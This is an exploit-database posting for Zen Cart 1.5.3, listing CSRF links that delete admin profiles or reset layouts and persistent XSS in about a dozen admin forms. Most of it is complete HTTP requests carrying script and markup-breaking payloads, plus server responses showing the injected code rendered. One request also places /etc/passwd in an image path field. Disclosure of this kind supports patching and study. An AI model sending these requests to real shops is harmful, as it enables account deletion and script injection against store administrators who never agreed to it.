0day.today - Biggest Exploit Database in the World.
Select your language:
Things you should know about 0day.today:
We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
We accept currencies: [contact admin to find more]
We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
I am registered user of 0day.today. I don't want to see this screen in future.
What to do first?
Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]
Main links
You can contact us by
Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ restore account ]
You can contact us by:
Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Zen Cart 1.5.3 - CSRF & Admin Panel XSS

Author
Smash_
Risk
[
Security Risk Medium
]
0day-ID
Category
Date add
Platform
#Title: Zen Cart 1.5.3 - CSRF & Admin Panel XSS
#Date: 09.07.14
#Vendor: zen-cart.com
#Tested on: Apache 2.2 [at] Linux
#Contact: smash[at]devilteam.pl

#1 - CSRF

- Delete admin

GET profile stands for user id.

localhost/zen/zen-cart-v1.5.3-07042014/admin123/profiles.php?action=delete&profile=2

- Reset layout boxes to default

localhost/zen/zen-cart-v1.5.3-07042014/admin123/layout_controller.php?page=&cID=74&action=reset_defaults


#2 - Persistent XSS in admin panel

Since admin privileges are required to execute following vulnerablities this is not a serious threat.

- Extras -> Media types -> Add

Vulnerable parameters - type_name & type_exit

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/media_types.php?page=1&mID=2&action=save HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------4978676881674017321390852339
Content-Length: 663

-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="securityToken"

b98019227f8014aed6d22b02f0748d11
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="type_name"

<h1>sup<!--
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="type_ext"

sup<>
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="x"

19
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="y"

13
-----------------------------4978676881674017321390852339--

Response:
(...)
<td class="dataTableContent"><h1>sup<!--</td>
<td class="dataTableContent">sup<></td>
<td class="dataTableContent" align="right">
(...)

- Extras -> Media manager -> Add

Vulnerable parameter - media_name

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/media_manager.php?page=1&mID=1&action=save HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------1835318161847256146721022401
Content-Length: 5633

-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="securityToken"

b98019227f8014aed6d22b02f0748d11
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="media_name"

<script>alert(666)</script>
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="x"

32
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="y"

16
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="clip_filename"; filename="cat.png"
Content-Type: image/png

(image)

-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="media_dir"


-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="media_type"

2
-----------------------------1835318161847256146721022401--

Response:
(...)
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
<tr class="infoBoxHeading">
  <td class="infoBoxHeading"><strong><script>alert(666)</script></strong></td>
</tr>

- Extras -> Music genre -> Add

Vulenrable parameter - music_genre_name

POST /zen/zen-cart-v1.5.3-07042014/admin123/music_genre.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------202746648818048680751007920584
Content-Length: 581

-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="securityToken"

b98019227f8014aed6d22b02f0748d11
-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="music_genre_name"

<script>alert(666)</script>
-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="x"

37
-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="y"

10
-----------------------------202746648818048680751007920584--

Response:
(...)
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/music_genre.php?page=1&mID=1&action=edit'">
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
</tr>
(...)

Further vuln:
http://localhost/zen/zen-cart-v1.5.3-07042014/index.php?main_page=index&typefilter=music_genre&music_genre_id=1

Response:
(...)
<div id="navBreadCrumb">  <a href="http://localhost/zen/zen-cart-v1.5.3-07042014/">Home</a>&nbps;::&nbps;
<script>alert(666)</script>
</div>
(...)

- Extras -> Record companies -> Add

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/record_company.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------19884630671863875697751588711
Content-Length: 5828

-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="securityToken"

b98019227f8014aed6d22b02f0748d11
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_name"

<script>alert(666)</script>
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_image"; filename="<img src=# onerror=alert(1)>.png"
Content-Type: image/png

-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="img_dir"

categories/
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_image_manual"

/etc/passwd
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_url[1]"

'>"><>XSS
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="x"

21
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="y"

13
-----------------------------19884630671863875697751588711--

Response:
(...)
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
</tr>
(...)

Further vuln:
http://localhost/zen/zen-cart-v1.5.3-07042014/index.php?main_page=index&typefilter=music_genre&music_genre_id=1

Response:
(...)
<div id="navBreadCrumb">  <a href="http://localhost/zen/zen-cart-v1.5.3-07042014/">Home</a>&nbps;::&nbps;
<script>alert(666)</script>
</div>
<div class="centerColumn" id="indexProductList">
<h1 id="productListHeading"><script>alert(666)</script></h1>
(...)

- Extras -> Recording Artists -> Add

Vulnerable parameter - artists_name

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/record_artists.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------14015448418946681711346093460
Content-Length: 1099

-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="securityToken"

84c8fe52eb9b3b0e026b5438e1c21f6f
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="artists_name"

<script>alert(666)</script>
-----------------------------14015448418946681711346093460
(Content-Disposition: form-data; name="artists_image"; filename=""
Content-Type: application/octet-stream


-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="img_dir"


-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="artists_image_manual"


-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="artists_url[1]"


-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="x"

39
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="y"

19
-----------------------------14015448418946681711346093460--)

Response:
(...)
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
  <tr class="infoBoxHeading">
    <td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
  </tr>
(...)

- Gift Certificate/Coupons ->  Coupon admin -> Add

Vulnerable parameters - coupon_name, coupon_desc, coupon_amount, coupon_min_order, coupon_code, coupon_uses_coupon, coupon_uses_user

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/coupon_admin.php?action=update&oldaction=new&cid=0&page=0 HTTP/1.1
Host: localhost

securityToken=84c8fe52eb9b3b0e026b5438e1c21f6f&coupon_name%5B1%5D=%27%3E%22%3E%3C%3EXSSD&coupon_desc%5B1%5D=%27%3E%22%3E%3C%3EXSSD&coupon_amount=%27%3E%22%3E%3C%3EXSSD&coupon_min_order=%27%3E%22%3E%3C%3EXSSD&coupon_free_ship=on&coupon_code=%27%3E%22%3E%3C%3EXSSD&coupon_uses_coupon=%27%3E%22%3E%3C%3EXSSD&coupon_uses_user=%27%3E%22%3E%3C%3EXSSD&coupon_startdate_day=9&coupon_startdate_month=7&coupon_startdate_year=2014&coupon_finishdate_day=9&coupon_finishdate_month=7&coupon_finishdate_year=2015&coupon_zone_restriction=1&x=62&y=10

Response:
(...)

      <tr>
        <td align="left">Coupon Name</td>
        <td align="left">'>"><>XSSD</td>
      </tr>
      <tr>
        <td align="left">Coupon Description <br />(Customer can see)</td>
        <td align="left">'>"><>XSSD</td>
      </tr>
      <tr>
        <td align="left">Coupon Amount</td>
        <td align="left"></td>
      </tr>

      <tr>
        <td align="left">Coupon Minimum Order</td>
        <td align="left">'>"><>XSSD</td>
      </tr>

      <tr>
        <td align="left">Free Shipping</td>
        <td align="left">Free Shipping</td>
      </tr>
      <tr>
        <td align="left">Coupon Code</td>
        <td align="left">'>"><>XSSD</td>
      </tr>

      <tr>
        <td align="left">Uses per Coupon</td>
        <td align="left">'>"><>XSSD</td>
      </tr>

      <tr>
        <td align="left">Uses per Customer</td>
        <td align="left">'>"><>XSSD</td>
      </tr>
(...)

- Gift Certificate/Coupons -> Mail gift certificate -> Send

Vulnerable parameter - email_to

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/gv_mail.php?action=preview HTTP/1.1
Host: localhost

securityToken=84c8fe52eb9b3b0e026b5438e1c21f6f&customers_email_address=Active+customers+in+past+3+months+%28Subscribers%29&email_to=%27%3E%22%3E%3C%3EXSSED&from=szit%40szit.in&subject=asdf&amount=666&message=asdf&x=13&y=12

Response:
(...)
</tr>
<tr>
<td class="smallText"><b>Customer:</b><br />'>"><>XSSED</td>
</tr>
<tr>
(...)

- Tools -> Banner manager -> Add

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/banner_manager.php?page=1&action=add HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------3847719184268426731396009422
Content-Length: 2317

-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="securityToken"

84c8fe52eb9b3b0e026b5438e1c21f6f
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="status"

1
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_open_new_windows"

0
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_on_ssl"

1
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_title"

'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_url"

'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_group"

BannersAll
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="new_banners_group"

'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_image"; filename=""
Content-Type: application/octet-stream


-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_image_local"


-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_image_target"


-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_html_text"

'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_sort_order"

15
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="date_scheduled"


-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="expires_date"


-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="expires_impressions"

0
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="x"

9
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="y"

7
-----------------------------3847719184268426731396009422--


Response:
(...)
<td class="dataTableContent"><a href="javascript:popupImageWindow('popup_image.php?banner=10')"><img src="images/icon_popup.gif" border="0" alt="View Banner" title=" View Banner "></a>&nbps;'>"><>XSS</td>
<td class="dataTableContent" align="right">'>"><>XSS</td>
<td class="dataTableContent" align="right">0 / 0</td>
(...)
  <tr class="infoBoxHeading">
    <td class="infoBoxHeading"><b>'>"><>XSS</b></td>
  </tr>
(...)

- Tools -> Newsletter and Product Notifications Manager -> New newsletter

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/newsletters.php?action=insert HTTP/1.1
Host: localhost

securityToken=93867dff1d912bde757ce2bc0ac94425&module=newsletter&title=%27%3E%22%3E%3C%3EXSS&message_html=%27%3E%22%3E%3C%3EXSS&content=%27%3E%22%3E%3C%3EXSS&x=32&y=8

Response:
(...)
<td class="dataTableContent"><a href="http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/newsletters.php?page=1&nID=1&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title=" Preview "></a>&nbps;'>"><>XSS</td>
<td class="dataTableContent" align="right">18 bytes</td>
(...)
<table border="0" width="100%" cellspacing="0" cellpadding="2">
  <tr class="infoBoxHeading">
    <td class="infoBoxHeading"><b>'>"><>XSS</b></td>
  </tr>
(...)

- Tools -> EZ-Pages -> New file

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/ezpages.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------134785397313015614741294511591
Content-Length: 2253

-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="securityToken"

c74a83cefbb5ffc1868dd4a390bd0880
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="x"

41
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="y"

17
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="pages_title"

'>"><>XSS
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="page_open_new_window"

0
-----------------------------134785397313015614741294511591

(...)

-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="pages_html_text"

'>"><>XSS
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="alt_url"


-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="alt_url_external"


-----------------------------134785397313015614741294511591--

Response:
(...)
<td class="dataTableContent" width="75px" align="right">&nbps;1</td>
<td class="dataTableContent">&nbps;'>"><>XSS</td>
(...)
  <tr class="infoBoxHeading">
    <td class="infoBoxHeading"><b>Title:&nbps;'>"><>XSS&nbps;|&nbps;Prev/Next Chapter:&nbps;0</b></td>
  </tr>
(...)

- Localization -> Currencies -> New currency

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/currencies.php?page=1&action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&title=%27%3E%22%3E%3C%3EXSS&code=%27%3E%22%3E%3C%3EXSS&symbol_left=%27%3E%22%3E%3C%3EXSS&symbol_right=%27%3E%22%3E%3C%3EXSS&decimal_point=%27%3E%22%3E%3C%3EXSS&thousands_point=%27%3E%22%3E%3C%3EXSS&decimal_places=%27%3E%22%3E%3C%3EXSS&value=%27%3E%22%3E%3C%3EXSS&x=13&y=15

Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">'>"</td>
(...)
  <tr class="infoBoxHeading">
    <td class="infoBoxHeading"><b>'>"><>XSS</b></td>
  </tr>
(...)
  <tr>
    <td class="infoBoxContent"><br>Title: '>"><>XSS</td>
  </tr>
  <tr>
    <td class="infoBoxContent">Code: '>"</td>
  </tr>
  <tr>
    <td class="infoBoxContent"><br>Symbol Left: '>"><>XSS</td>
  </tr>
  <tr>
    <td class="infoBoxContent">Symbol Right: '>"><>XSS</td>
  </tr>
(...)
  <tr>
    <td class="infoBoxContent"><br>Example Output:<br>$30.00 = '>"><>XSS0'>"><>XSS</td>
  </tr>
</table>
(...)
  <tr>
    <td class="infoBoxContent"><br>Example Output:<br>$30.00 = '>"><>XSS0'>"><>XSS</td>
  </tr>

- Localization -> Languages -> New language

Affects big part of admin panel.

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/languages.php?action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&name=%27%3E%22%3E%3C%3EXSS&code=xs&image=icon.gif&directory=%27%3E%22%3E%3C%3EXSS&sort_order=%27%3E%22%3E%3C%3EXSS&x=40&y=20
  
Response:
(...)
    <td class="messageStackCaution"><img src="images/icons/warning.gif" border="0" alt="Warning" title=" Warning ">&nbps;MISSING LANGUAGE FILES OR DIRECTORIES ... '>"><>XSS '>"><>XSS</td>
  </tr>
</table>
(...)
                <td class="dataTableContent">'>"><>XSS</td>
                <td class="dataTableContent">xs</td>
(...)
    <td class="infoBoxHeading"><b>'>"><>XSS</b></td>
  </tr>
(...)
  <tr>
    <td class="infoBoxContent"><br>Name: '>"><>XSS</td>
  </tr>
  <tr>
    <td class="infoBoxContent">Code: xs</td>
  </tr>
  <tr>
    <td class="infoBoxContent"><br><img src="http://localhost/zen/zen-cart-v1.5.3-07042014/includes/languages/'>"><>XSS/images/icon.gif" border="0" alt="'>"><>XSS" title=" '>"><>XSS "></td>
  </tr>
  <tr>
    <td class="infoBoxContent"><br>Directory:<br>http://localhost/zen/zen-cart-v1.5.3-07042014/includes/languages/<b>'>"><>XSS</b></td>
  </tr>
(...)

Further injection:
http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php

- Localization -> Orders status -> Insert

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php?page=1&action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&orders_status_name%5B2%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B1%5D=%27%3E%22%3E%3C%3EXSS&x=9&y=7

Response:
(...)
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php?page=1&oID=5&action=edit'">
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent" align="right"><img src="images/icon_arrow_right.gif" border="0" alt="">&nbps;</td>
(...)

- Locations / Taxes -> Zones -> New zone

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/zones.php?page=1&action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&zone_name=%27%3E%22%3E%3C%3EXSS&zone_code=%27%3E%22%3E%3C%3EXSS&zone_country_id=247&x=17&y=11

Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent" align="center">'>"><>XSS</td>
(...)
    <td class="infoBoxHeading"><b>'>"><>XSS</b></td>
  </tr>
</table>
(...)
  <tr>
    <td class="infoBoxContent"><br>Zones Name:<br>'>"><>XSS ('>"><>XSS)</td>
  </tr>
  <tr>
    <td class="infoBoxContent"><br>Country: '>"><>XSS</td>

- - Locations / Taxes -> Zone definitions -> Insert

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/geo_zones.php?zpage=1&zID=1&action=insert_zone HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&geo_zone_name=%27%3E%22%3E%3C%3EXSS&geo_zone_description=%27%3E%22%3E%3C%3EXSS&x=25&y=13

Response:
(...)
</a>&nbps;'>"><>XSS</td>
<td class="dataTableContent">'>"><>XSS</td>
(...)
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
(...)
<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>

- Locations / Taxes -> Tax Classes -> New tax class

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/tax_classes.php?page=1&action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&tax_class_title=%27%3E%22%3E%3C%3EXSS&tax_class_description=%27%3E%22%3E%3C%3EXSS&x=33&y=9

Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
(...)
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
(...)
<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
(...)

- - Locations / Taxes -> Tax Rates -> New tax rate

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/tax_rates.php?page=1&action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&tax_class_id=2&tax_zone_id=2&tax_rate=66&tax_description=%27%3E%22%3E%3C%3EXSS&tax_priority=&x=32&y=16

Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">66%</td>
<td class="dataTableContent">'>"><>XSS</td>
(...)
  <tr class="infoBoxHeading">
    <td class="infoBoxHeading"><b>'>"><>XSS</b></td>
  </tr>
(...)
    <td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
(...)


- Customers -> Group Pricing -> Insert

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/group_pricing.php?action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&group_name=%27%3E%22%3E%3C%3EXSS&group_percentage=%27%3E%22%3E%3C%3EXSS&x=10&y=9

Response:
(...)
<td class="dataTableContent">1</td>
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">0.00</td>
(...)
  <tr class="infoBoxHeading">
    <td class="infoBoxHeading"><b>'>"><>XSS</b></td>
  </tr>
(...)

#  0day.today [2024-11-15]  #
We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Zen Cart 1.5.3 - CSRF & Admin Panel XSS

Report Error

Report Error
